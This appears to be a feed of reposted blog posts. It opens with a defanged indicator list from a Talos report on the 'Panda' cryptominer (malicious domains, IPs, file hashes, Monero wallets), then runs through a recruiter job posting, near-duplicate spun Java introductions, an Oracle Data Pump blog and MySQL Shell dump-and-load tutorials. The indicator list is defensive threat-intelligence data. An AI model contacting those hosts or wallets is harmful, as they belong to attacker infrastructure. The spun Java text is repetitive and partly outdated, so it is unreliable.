pool[.]bulehero[.]in
pxi[.]hognoob[.]se
pxx[.]hognoob[.]se
q1a[.]hognoob[.]se
qie[.]fxxxxxxk[.]me
rp[.]oiwcvbnc2e[.]stream
uio[.]heroherohero[.]info
uio[.]hognoob[.]se
upa1[.]hognoob[.]se
upa2[.]hognoob[.]se
wiu[.]fxxxxxxk[.]me
yxw[.]hognoob[.]se
zik[.]fxxxxxxk[.]me
IPs
184[.]168[.]221[.]47
172[.]104[.]87[.]6
139[.]162[.]123[.]87
139[.]162[.]110[.]201
116[.]193[.]154[.]122
95[.]128[.]126[.]241
195[.]128[.]127[.]254
195[.]128[.]126[.]120
195[.]128[.]126[.]243
195[.]128[.]124[.]140
139[.]162[.]71[.]92
3[.]123[.]17[.]223
46[.]173[.]217[.]80
5[.]56[.]133[.]246
SHA-256
2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1
fa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220
2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb
829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08
8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec
1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27
0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5
f9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a
34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb
29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f
3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976
a415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1
4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c
8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21
991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e
a3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1
9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3
d5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca
29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f
6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d
Monero Wallets
49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126
4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh
44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L
Go to Source: "Cryptocurrency miners aren't dead yet: Documenting the voracious but simple 'Panda'" (original post from Talos Security, by Christopher Evans and David Liebenberg).
hireindianpvtltd · 6 years ago
Text
Fwd: Urgent requirements with one of our Clients.
New Post has been published on https://www.hireindian.in/fwd-urgent-requirements-with-one-of-our-clients/
Fwd: Urgent requirements with one of our Clients.
Hi  
Job Title / Location
Technical Lead – Web methods Admin - Framingham, MA
HR Technical Resource with EBS - Arlington, VA
Oracle BRM (Billing Revenue Management) Tester - San Antonio, TX
Magento Developer - Coppell, TX
Big Machines/ Oracle CPQ Cloud architect - Sunnyvale, CA
Drupal Architect - Fort Worth, TX
  Job Title: Technical Lead – Web methods Admin
Location: Framingham, MA
Duration: 1 year
  Job Description 
4+ years of system administration experience with the webMethods 9.9 platform, including Integration Server, Trading Networks, JDBC Adapter, Broker, Active Transfer Server, MWS, Optimize for Infrastructure and Deployer
Experience in installation of fixes and patches, and installation of the webMethods product suite with the most recent versions in webMethods 9.9
Experience in planning and aligning to meet cutover activities.
Experience in Certificate Configurations, analyzing thread dumps and provide statistics.
Ability to efficiently multi-task and be self-motivated while working with others.
Experience in MSSQL and any other RDBMS(DB2/400) concepts.
Good to have hands on experience on combination of Security Protocol, Splunk, Python, Unix Scripts, Java, Talend, Angular, BigData Hadoop, Kafka, SOLR
Candidate should possess experience in client facing role and should also have experience in onsite-offshore co-ordination
Resource will be required to provide on-call support over weekends during EST hours and on Holidays on rotation basis
Job Title: HR Technical Resource with EBS
Location: Arlington, VA
Duration: Contract
  Job description
ADF/OA Framework
REST API and/or Web Services
Integration/Interfaces
Workflow/Business Events
AME (Approvals Management Engine)
XML/BI Publisher Reports
Linux/Unix scripting knowledge
SQL/PLSQL & Version Control tools
Personalization and System Administration Knowledge
Functional Knowledge for:
HR (Core HR, Compensation Workbench)
  Job Title: Oracle BRM (Billing Revenue Management) Tester
Location: San Antonio, TX
Interview Mode: Skype
Duration: 6 Months
  Skill Set:
Primary Technology : Oracle BRM (Billing Revenue Management) – Commercial Product
Extensive experience in Oracle BRM functional testing or implementation
Extensive knowledge in General Ledger is preferred
Knowledge in Unix & SQL operations
Test Automation Skill is preferred
  Job Description:
To interact with Business user, Business Analyst to groom requirement / follow up on deliveries on priority
Able to estimate the effort for projects
To plan and design test strategy (functional / GL)  and sync up with offshore team
To Review the test plan & test evidences before sign off
To review and set a strategy for test automation and able to clarify technical glitches
Position: Magento Developer
Location: Coppell, TX
Contract
  Job Description:
Technical Skills:
5+ Years Magento
2 + PHP + MySQL
Git version control
Linux console
RabbitMQ
Redis
  Responsibilities:             
Review, develop and implement innovative features and functionality for tools and modules based on client need
Work with highly loaded Magento modules, complex architecture and business logic
Optimize existing code / database schemes throughout the platform
Work closely with developers and other teams as well as independently on projects
Position: Big Machines/ Oracle CPQ Cloud architect
Location: Sunnyvale, CA
Duration: 6 MONTHS
Experience: 10Years
  Job Description:
Overall 10+ years of experience, with 5+ years of extensive experience in the following modules:
Oracle CPQ Cloud: Site Administration
Introduction to Oracle CPQ Cloud
Data Tables
File Manager
User Management
Oracle CPQ Cloud Configuration
Product Hierarchy
Configuration flows
Rules
Layouts
Oracle CPQ Cloud Commerce
Quote and Quote lines architecture
Pricing rules and pricing engine.
Approval workflows
Oracle CPQ Cloud Document Designer
Quotation generation
XSL templates
       BML/BQML
Hands-on experience writing BML rues in Configuration and commerce.
        Integration:
3-4 implementation projects’ experience.
Worked on integrations between CPQ and CRM (SFDC OR SAP C4C).
Worked on integrations between CPQ and EBS R12 application for Q2O flow.
Excellent Oral and written communication skills. Vast experience in dealing with business users to understand and convert the complex problems statements into functional/technical design.
Job Title: Drupal Architect
Location: Fort Worth, TX
Duration: 12 Months
Experience: 8+ Years
  Job Description:
The ideal candidate should have several years of Drupal 7 and 8 experience in building large-scale web sites and applications, Service oriented architecture, integration with multiple systems, and enjoy collaborating with cross-functional teams in a fast paced environment. The successful candidate will have the ability to develop high-quality code, have excellent communication skills, love solving complex problems, and lead in project design and direction.
  Responsibilities: 
Understand and analyze business/technical requirements, architect innovative, scalable and efficient solutions
Application design with core and custom modules and implementation of Service layer and integration of application with multiple external systems.
Interact with distributed teams to ensure smooth delivery of application
Participate in daily meetings and regular planning and review sessions
Provide documentation as required and lead code reviews, planning sessions and routine status stand-ups
Provide accurate level of effort time estimates and provide recommendations for feature prioritization
Assist in release/deployment planning and execution activities
  Requirements/Qualifications: 
12+ years’ experience in web application development with minimum 6 years’ experience in Drupal application development
Advanced experience in Drupal 7, 8 and LAMP stack – PHP, MySQL and HTML/CSS/AJAX/JavaScript along
Advanced experience with Drupal architecture, best practices, and coding standards
Advance experience with third-party applications/tools and integration
Experience with Acquia Cloud Site Factory will be preferred
Experience with object-oriented design and data modelling
Experience of Web Analytics applications
Experience with performance optimization of Drupal application
Experience of DevOps, Dockers, Virtualization
Experience with source/version control systems like GIT/ SVN
Knowledge of web application security considerations
Familiarity with user experience design principles and processes
Excellent verbal/written communication skills and strong time management and analytical/problem solving abilities
Experience with continuous integration best practice and deployment strategy
Experience with Selenium or similar automated testing frameworks.
Experience in Cloud web application architecture
  Thanks & Regards,
  Mike Tye (Ravikant)
Talent Acquisition Team – North America
Vinsys Information Technology Inc
SBA 8(a) Certified, MBE/DBE/EDGE Certified
Virginia Department of Minority Business Enterprise(SWAM)
703-349-3271
www.vinsysinfo.com
https://www.linkedin.com/in/ravikant-mike-tye-janawadkar-809181122
smileitconfusespeoplex · 7 years ago
Text
Java Sample Programs - The Simple Way To Java
Java is a general-purpose computer programming language that is concurrent, class-based, object-oriented, and specifically designed to have as few implementation dependencies as possible. It is intended to let application developers "write once, run anywhere" (WORA), meaning that compiled code can run on all platforms that support Java without the need for recompilation. Applications are typically compiled to bytecode that can run on any Java virtual machine (JVM) regardless of computer architecture. As of 2015, it is one of the most popular programming languages in use, particularly for client-server web applications, with a reported 9 million developers. It was originally developed by James Gosling at Sun Microsystems (which has since been acquired by Oracle Corporation) and released in 1995 as a core component of Sun Microsystems' Java platform. The language derives much of its syntax from C and C++, but it has fewer low-level facilities than either of them.

The original and reference implementation Java compilers, virtual machines, and class libraries were initially released by Sun under proprietary licenses. As of May 2007, in compliance with the specifications of the Java Community Process, Sun relicensed most of its Java technologies under the GNU General Public License. Others have also developed alternative implementations of these Sun technologies, such as the GNU Compiler for Java (bytecode compiler), GNU Classpath (standard libraries), and IcedTea-Web (browser plugin for applets). The most recent version is Java 8, which is the only version currently supported for free by Oracle, though earlier versions are supported both by Oracle and other companies on a commercial basis.

Java is a general-purpose, high-level programming language developed by Sun Microsystems. A small team of engineers, called the Green Team, started the language in 1991. It was originally called Oak and was designed for handheld devices and set-top boxes. Oak was unsuccessful, so in 1995 Sun changed the name to Java and modified the language to take advantage of the burgeoning World Wide Web. Today it is a commonly used foundation for developing and delivering content on the Web. According to Oracle, there are more than 9 million Java developers worldwide and more than 3 million mobile phones run it.

Java is an object-oriented language similar to C++, but simplified to eliminate language features that cause common programming errors. Its source code files (files with a .java extension) are compiled into a format called bytecode (files with a .class extension), which can then be executed by a Java interpreter. Compiled Java code can run on most computers because Java interpreters and runtime environments, known as Java Virtual Machines (VMs), exist for most operating systems, including UNIX, the Macintosh OS, and Windows. Bytecode can also be converted directly into machine language instructions by a just-in-time compiler (JIT). In 2007, most Java technologies were released under the GNU General Public License.

Java is a general-purpose programming language with a number of features that make it well suited for use on the World Wide Web.
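As a small illustration of the compile-then-run workflow described above, the two commands below compile a single source file to bytecode and then execute it on the JVM; the file name HelloWorld.java is an illustrative assumption.

javac HelloWorld.java   # compiles the .java source into HelloWorld.class bytecode
java HelloWorld         # the JVM loads the bytecode and runs it, JIT-compiling hot code paths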
Small Java programs are called Java applets and may be downloaded from a web server and run on your PC by a Java-compatible web browser. Applications and websites using Java will not work unless it is installed on your device. When you download Java, the package contains the Java Runtime Environment (JRE), which is required for it to run in a web browser. A component of the JRE, the Java Plug-in software, enables Java applets to run inside various browsers. The official Java website provides links to freely download the latest version of Java. You can use the website to learn more about downloading Java, verify it is installed on your computer, remove older versions, troubleshoot Java, or report a problem. After installing Java, you will need to restart your web browser.
atravelingcrescendo · 7 years ago
Text
Career in PHP or Java: Which One Is Better For Beginners?
Compiled code can run on any Java virtual machine (JVM) regardless of the underlying computer architecture. As of 2015, it is one of the most popular programming languages in use, especially for client-server web applications, with a reported 9 million developers. It was originally created by James Gosling at Sun Microsystems (which has since been acquired by Oracle Corporation) and released in 1995 as a core component of Sun Microsystems' Java platform. The language derives much of its syntax from C and C++, but it has fewer low-level facilities than either of them.

The original and reference implementation Java compilers, virtual machines, and class libraries were originally released by Sun under proprietary licenses. As of May 2007, in compliance with the specifications of the Java Community Process, Sun relicensed nearly all of its Java technologies under the GNU General Public License. Others have also developed alternative implementations of these Sun technologies, for example the GNU Compiler for Java (bytecode compiler), GNU Classpath (standard libraries), and IcedTea-Web (browser plugin for applets). The most up-to-date version is Java 8, which is the only version currently supported free of charge by Oracle, although earlier versions are supported both by Oracle and others on a commercial basis.

Java is a general-purpose, high-level programming language developed by Sun Microsystems. A small group of engineers, called the Green Team, began the language in 1991. It was originally named Oak and was designed for mobile gadgets and set-top boxes. Oak was unsuccessful, so in 1995 Sun changed the name to Java and modified the language to take advantage of the blossoming World Wide Web. Nowadays it is a commonly used foundation for producing and delivering content on the Web. According to Oracle, there are more than 9 million Java developers overall and more than 3 million mobile phones run it.

Java is an object-oriented language much like C++, but simplified to eliminate language features that cause common coding mistakes. Its source code files (documents with a .java extension) are compiled into a format called bytecode (files with a .class extension), which can then be executed by a Java interpreter. Compiled Java code can run on most PCs because Java interpreters and runtime environments, known as Java Virtual Machines (VMs), exist for most operating systems, including UNIX, the Macintosh OS, and Windows. Bytecode can also be converted directly into machine language instructions by a just-in-time compiler (JIT). In 2007, most Java technologies were released under the GNU General Public License.

Java is a general-purpose programming language with a number of components that make it well suited for use on the World Wide Web. Small Java applications are called Java applets and may be downloaded from a web server and run on your PC by a Java-compatible web browser. Applications and websites using Java won't function unless it's installed on your device. Once you download Java, the package provides the Java Runtime Environment (JRE), which is required for it to run in a web browser. A component of the JRE, the Java Plug-in software, enables Java applets to run inside various browsers. The official Java site provides links to freely download the most recent release of Java.
You are able to make use of the site to learn more about getting it, validate it is fitted on your pc, remove older versions, troubleshoot Java or report an issue. Following installing It, you will need to restart your Internet browser.
0 notes
deepika456-blog · 8 years ago
Text
Data Pump Mode
An Oracle DBA professional course is there for you to build your career in Oracle.
Over the past years we have seen three major releases of Oracle: 9i, 10g and 11g. There is a question that is often asked, and I ask it as well: which is the best release, or which are the most popular features of Oracle?
Real Application Clusters and Data Guard in 9i
Grid Control and Data Pump in 10g
Automatic SQL Tuning and Edition-Based Redefinition in 11g
There have been so many new, excellent and essential features, but let us say that they all serve the advancement of humanity and the latest growth of IT. Perhaps?
In 11gR2, Oracle decided to introduce Data Pump Legacy Mode in order to provide backward compatibility for scripts and parameter files used with the original export/import utilities. The documentation briefly says: “This feature enables users to continue using original Export and Import scripts with Data Pump Export and Import. Development time is reduced as new scripts do not have to be created.”
If you check AristaDBA’s Oracle Blog and read the first three paragraphs you will probably see what this is about. I fully agree with everything written there.
And I don’t really get it: why do we have Data Pump Legacy Mode? Do Oracle customers badly need it? Were exp/imp so great that we must have them back? How about a RAC Legacy Mode if I want to use the gc_files_to_lock or freeze_db_for_fast_instance_recovery parameters? There really was a parameter called freeze_db_for_fast_instance_recovery, I am not making this up. Run this one:
SELECT kspponm,
DECODE(ksppoflg, 1,'Obsolete', 2, 'Underscored') as "Status"
FROM x$ksppo
WHERE kspponm like '%freeze%'
ORDER BY kspponm;
However, the Data Pump Legacy Mode feature exists, and once you use any classic export/import parameter you put Data Pump into legacy mode. Just one parameter is enough. In Oracle's words, Data Pump enters legacy mode once it determines that a parameter unique to original Export or Import is present. Of course, some parameters like buffer, commit, compress, object_consistent, recordlength, resumable, statistics, compile, filesize, tts_owners, streams_configuration and streams_instantiation are simply ignored.
Now, here is a paradox or a simple documentation error: deferred_segment_creation is set to TRUE by default in 11gR2. Have a look at the documentation:
SQL> create table TEST (c1 number, c2 varchar2(10), c3 date) storage (initial 5M);
Table created.
SQL> select bytes, blocks, segment_type, segment_name from dba_segments where segment_name='TEST';
no rows selected
C:\>expdp julian/password dumpfile=data_pump_dir:abc_%U.dat schemas=julian include=TABLE:in('TEST') logfile=abc.log buffer=1024
Export: Release 11.2.0.2.0 - Production on Wed May 11 07:53:45 2011
Copyright (c) 1982, 2009, Oracle and/or its affiliates.  All rights reserved.
Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
 Legacy Mode Active due to the following parameters:
 Legacy Mode Parameter: "buffer=1024" Location: Command Line, ignored.
 Legacy Mode has set reuse_dumpfiles=true parameter.
Starting "JULIAN"."SYS_EXPORT_SCHEMA_01":  julian/******** dumpfile=data_pump_dir:abc_%U.dat schemas=julian
 include=TABLE:in('TEST') logfile=abc.log reuse_dumpfiles=true
Estimate in progress using BLOCKS method...
Processing object type SCHEMA_EXPORT/TABLE/TABLE_DATA
Total estimation using BLOCKS method: 0 KB
Processing object type SCHEMA_EXPORT/TABLE/TABLE
. . exported "JULIAN"."TEST"                                 0 KB       0 rows
Master table "JULIAN"."SYS_EXPORT_SCHEMA_01" successfully loaded/unloaded
******************************************************************************
Dump file set for JULIAN.SYS_EXPORT_SCHEMA_01 is:
  C:\ORACLE\ADMIN\JMD\DPDUMP\ABC_01.DAT
Job "JULIAN"."SYS_EXPORT_SCHEMA_01" successfully completed at 07:54:07
But it is not true that you cannot export tables with no segments. Here is the proof:
C:\>exp userid=julian/abc file=C:\Oracle\admin\JMD\dpdump\a.dmp tables=julian.test
Export: Release 11.2.0.2.0 - Production on Wed May 11 08:31:08 2011
Copyright (c) 1982, 2009, Oracle and/or its affiliates.  All rights reserved.
Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
Export done in AL32UTF8 character set and AL16UTF16 NCHAR character set
About to export specified tables via Conventional Path ...
. . exporting table                           TEST          0 rows exported
Export terminated successfully without warnings.
But forget about this Legacy Mode. Do not use it. Pretend it does not exist.
Let us now look at some popular new features of Data Pump. Remember that in 11gR2 several limitations have already been removed:
– The restriction that in TABLES mode all tables had to reside in the same schema.
– The restriction that only one object (table or partition) could be specified if wildcards were used as part of the object name.
For RAC users: Data Pump worker processes can now be distributed across Oracle RAC instances, a subset of Oracle RAC instances, or restricted to the instance where the Data Pump job starts. It is also now possible to start Data Pump jobs and run them on different Oracle RAC instances at the same time.
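To illustrate (a rough sketch only; the directory object, dump file and service names here are invented), the 11gR2 CLUSTER and SERVICE_NAME parameters control where the worker processes run:
expdp system schemas=scott dumpfile=dp_dir:scott_%U.dmp parallel=4 cluster=y service_name=dp_workers
expdp system schemas=scott dumpfile=dp_dir:scott.dmp cluster=n
The first command lets workers spread across the instances behind the dp_workers service; the second pins the whole job to the instance where it was started.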
For XMLType column users: there is a new DISABLE_APPEND_HINT value for the DATA_OPTIONS parameter, which disables the APPEND hint while loading the data object.
For EBR users: specific editions can be exported and imported. Using the SOURCE_EDITION parameter on export and the TARGET_EDITION parameter on import, you can export a particular edition of the database and import into a particular edition of the database.
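As a rough illustration (the edition names, dump file and directory object below are made up for this example), an edition-aware export and import would look something like:
expdp system schemas=hr dumpfile=dp_dir:hr_rel1.dmp source_edition=rel_1
impdp system schemas=hr dumpfile=dp_dir:hr_rel1.dmp target_edition=rel_2
Only objects visible in the specified source edition are unloaded, and editionable objects are created in the target edition on import.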
Data Pump is among the Oracle tools with the fewest bugs! Although it is hard to say these days what is a bug, what is a feature and what is a duplicate enhancement. There are about 100 kinds of bugs.
Thus, our Oracle training course is always there to help you become a DBA professional.
0 notes
globalmediacampaign · 5 years ago
Text
Faster logical backup of a single table in MySQL.
Logical backups are of great use in data migration across cloud environments and in table-level recoveries. The new MySQL Shell 8.0.22 has introduced a couple of new utilities, util.dumpTables() and util.exportTable(), to export individual tables from MySQL. Prior to 8.0.22 it was not possible to make a backup of a single table using MySQL Shell. With MySQL Shell's new table dump utility util.dumpTables() we can take a dump of specific tables of a schema. It works in the same way as the instance dump utility util.dumpInstance() and the schema dump utility util.dumpSchemas() introduced in 8.0.21, but with a different selection of suitable options. The exported items can then be imported into a MySQL Database Service DB System (a MySQL DB System, for short) or a MySQL Server instance using MySQL Shell's dump loading utility util.loadDump(). MySQL Shell's new table export utility util.exportTable() exports a table as a relational data file on the local server. We can dump a huge table faster using util.dumpTables(); it takes less time compared to mysqldump, mydumper and mysqlpump.
Making a dump using util.dumpTables()
We need the latest MySQL Shell 8.0.22. For our use case I have loaded 100M records into a single table using sysbench. The size of the data after loading is around 20 GB. Loading the data with 100M records using sysbench:
[root@mydbopstest ~]# sysbench /usr/share/sysbench/oltp_read_write.lua --mysql-port=3306 --mysql-user=root --mysql-password --mysql-socket=/data/mysql/mysql.sock --mysql-db=test1 --db-driver=mysql --tables=1 --table-size=100000000 prepare
sysbench 1.0.20 (using bundled LuaJIT 2.1.0-beta2)
Creating table 'sbtest1'...
Inserting 100000000 records into 'sbtest1'
Creating a secondary index on 'sbtest1'...
[root@mydbopstest ~]#
Step 1: Connect to the MySQL server with the Shell utility
In this case my database server is MySQL 5.7.30 (Percona). The Shell utility is compatible with any MySQL version.
[root@mydbopstest ~]# mysqlsh root@localhost --socket=/data/mysql/mysql.sock
Please provide the password for 'root@/data%2Fmysql%2Fmysql.sock': **********
MySQL Shell 8.0.22
Copyright (c) 2016, 2020, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help' or '?' for help; 'quit' to exit.
Creating a session to 'root@/data%2Fmysql%2Fmysql.sock'
Fetching schema names for autocompletion... Press ^C to stop.
Your MySQL connection id is 2660844
Server version: 5.7.30-33-log Percona Server (GPL), Release 33, Revision 6517692
No default schema selected; type use to set one.
MySQL localhost JS >
Step 2: Initiate the single table backup with the Shell utility
Ensure that you have connected with the Shell utility in JS mode. We have used the default of 4 threads at the time of backup.
MySQL localhost JS > util.dumpTables("test1", [ "sbtest1" ], "/root/dump_table");
Acquiring global read lock
Global read lock acquired
All transactions have been started
Locking instance for backup
NOTE: Backup lock is not supported in MySQL 5.7 and DDL changes will not be blocked. The dump may fail with an error or not be completely consistent if schema changes are made while dumping.
Global read lock has been released
Writing global DDL files
Writing DDL for table `test1`.`sbtest1`
Preparing data dump for table `test1`.`sbtest1`
Data dump for table `test1`.`sbtest1` will be chunked using column `id`
Running data dump using 4 threads.
NOTE: Progress information uses estimated values and may not be accurate.
Data dump for table `test1`.`sbtest1` will be written to 788 files
1 thds dumping - 101% (100.00M rows / ~98.57M rows), 278.86K rows/s, 55.22 MB/s uncompressed, 24.63 MB/s compressed
Duration: 00:06:55s
Schemas dumped: 1
Tables dumped: 1
Uncompressed data size: 19.79 GB
Compressed data size: 8.83 GB
Compression ratio: 2.2
Rows written: 100000000
Bytes written: 8.83 GB
Average uncompressed throughput: 47.59 MB/s
Average compressed throughput: 21.23 MB/s
It took around 7 minutes (6:55) to make a backup of the single table of size 20 GB. The backup is stored in compressed TSV files.
Step 3: Load the single table backup via the Shell utility
Now let us load the single table data back via the util.loadDump() utility. We have used 4 threads to import the data.
MySQL localhost JS > util.loadDump("/home/root/dump_table",{schema:'test1'})
Loading DDL and Data from '/home/root/dump_table' using 4 threads.
Opening dump...
Target is MySQL 5.7.30-33-log. A dump was produced from MySQL 5.7.30-33-log
Checking for pre-existing objects...
Executing common preamble SQL
[Worker003] Executing DDL script for `test1`.`sbtest1`
[Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker002] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker003] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker003] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker002] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker002] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker003] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
4 thds loading | 2% (399.22 MB / 19.79 GB), 2.60 MB/s, 1 / 1 tables done
[Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker002] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
Deleted: 0 Skipped: 0 Warnings: 0
[Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker003] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0
[Worker002] test1@sbtest1@@787.tsv.zst: Records: 127339 Deleted: 0 Skipped: 0 Warnings: 0
Executing common postamble SQL
788 chunks (100.00M rows, 19.79 GB) for 1 tables in 1 schemas were loaded in 30 min 20 sec (avg throughput 7.98 MB/s)
0 warnings were reported during the load.
MySQL localhost JS >
It took around 30 minutes to load the data. Further optimisation is still possible by disabling the redo log in MySQL 8 and improving the parallelism, but this is already a huge improvement.
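A hedged sketch of that redo-log optimisation (it assumes the destination server is MySQL 8.0.21 or later, where the statement exists; our 5.7 target above does not support it, and it should only be done on a disposable, rebuildable instance because the server cannot crash-recover while the redo log is disabled):
MySQL  localhost  SQL > ALTER INSTANCE DISABLE INNODB REDO_LOG;
(switch to JS mode and run util.loadDump() as shown above)
MySQL  localhost  SQL > ALTER INSTANCE ENABLE INNODB REDO_LOG;
Re-enabling the redo log after the load is essential before putting any real traffic on the instance.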
Using the MySQL Shell utilities will save more time compared to other logical backup tools. I have repeated the test with other popular logical backup tools like mysqldump and mydumper. The results are below.
Tool             Backup Time   Import Time   Size of backup
mysqldump        20 Min        60 Min        12 GB
mydumper         10 Min        50 Min        10 GB
Shell utilities  7 Min         30 Min        8 GB
Comparing other logical backup tools
The MySQL Shell utility seems to be faster for single table backup and loading too. This can help database engineers with table rebuilds for partitions and migrations across cloud infrastructure, and it can replace the regular logical backup too. https://mydbops.wordpress.com/2020/11/20/mysql-shell-dump-loading-utility/
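As a closing side note, the table export utility mentioned at the beginning can be used when all you need is a single flat file (tab-separated by default) rather than a chunked, compressed dump. A minimal sketch, with an illustrative output path:
MySQL localhost JS > util.exportTable("test1.sbtest1", "/tmp/sbtest1.tsv")
The resulting file can be loaded back with util.importTable() or LOAD DATA, but unlike util.dumpTables() it does not carry the table's DDL.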
0 notes
wordpress-blaze-230204402 · 14 days ago
Text
Specialized Turbo Levo – Elevating the E-MTB Benchmark
In the dynamic realm of electric mountain bikes, the Specialized Turbo Levo has consistently set standards. The latest model, a blend of technological sophistication and rugged capability, promises to elevate your trail experience. We took it for a rigorous test to see if it lives up to the hype.
Cutting-Edge Tech Meets Trail-Ready Performance
Core Features
Motor and Battery Efficiency: The Turbo Levo's heart is its quietly powerful motor, complemented by a long-lasting battery. It's designed for endurance and reliability, ensuring that even the most ambitious routes are within your grasp.
Frame and Suspension Dynamics: The bike's structure strikes a balance between durability and nimbleness. The refined suspension system adeptly tackles the rigours of challenging trails, enhancing rider control.
Smart Connectivity: With the integration of Specialized's Mission Control app, riders have unprecedented control over their ride experience. Tailor your bike’s performance to your liking, from motor output to tracking your epic rides.
On the Trail
On the trails, the Turbo Levo is a revelation. Its motor assists not just with a silent push on ascents but also ensures that the bike feels natural and responsive. Downhill, it's a stable beast, giving you confidence to tackle tricky descents. Whether navigating tight switchbacks or powering over rocky paths, the Turbo Levo handles with an assuredness that's both impressive and exhilarating.
Who Will Love This Bike?
The Turbo Levo will attract a broad audience. From seasoned mountain bikers looking for an e-bike that doesn’t compromise on performance, to those seeking a powerful companion for adventurous explorations, it caters to a wide spectrum of riders.
Investment Worth Considering?
There's no skirting around it: the Turbo Levo is a premium product with a price tag to match. However, for those who value the intersection of top-tier technology and trail-conquering capability, it represents a worthwhile investment.
Our Take
The Specialized Turbo Levo is not just another e-mountain bike; it's a statement. It combines technological innovation with trail performance in a way that few others can match. This bike is about pushing boundaries – both of the trails you ride and what you expect from an e-MTB.
Source: Specialized Turbo Levo – Elevating the E-MTB Benchmark
81 notes
globalmediacampaign · 5 years ago
Text
How to Migrate an On-premises MySQL Database to MySQL Database Service (MDS)?
A guide to migrating a production MySQL database running on-premises to Oracle Cloud MySQL Database Service (MDS). I have one production database that I would like to migrate to the Oracle Cloud PaaS model, i.e. MySQL Database Service; we will walk through how to migrate the customerDB database from on-premises to Oracle Cloud MySQL Database Service (MDS).
Note: it is recommended that the on-premises MySQL and MDS both run the same version, i.e. 8.0, and the MySQL Shell utility must be 8.0.21 onwards. Make sure the application is disconnected and not sending any traffic during the migration process.
We will use two new features introduced with the latest release of MySQL Shell 8.0.21:
1. Dump Schema utility — this will help us take the backup from the on-premises database and export it to Oracle Cloud Object Storage.
2. Load Dump utility — this will help us import the schema from Object Storage, run from a compute instance.
More info: https://dev.mysql.com/doc/mysql-shell/8.0/en/mysql-shell-utilities-dump-instance-schema.html
How does the migration work?
Suppose you want to lift-and-shift a database called “customerDB”: the Schema Dump utility will export the customerDB database from on-premises to OCI (Oracle Cloud Infrastructure) Object Storage. Then the Load Dump utility will import it directly into the MySQL Database Service running in Oracle Cloud as a PaaS model. I have made the diagram below for clear understanding…
What do we need handy?
1. MySQL Shell 8.0.21.
2. On-premises MySQL up and running.
3. MDS up and running.
4. OCI CLI installed on the on-premises machine.
5. OCI CLI installed on the OCI (Oracle Cloud) compute instance.
6. The local_infile variable must be ON on the destination machine.
How to deploy MDS?
The blog below will help us create the MDS instance.
Additional Details
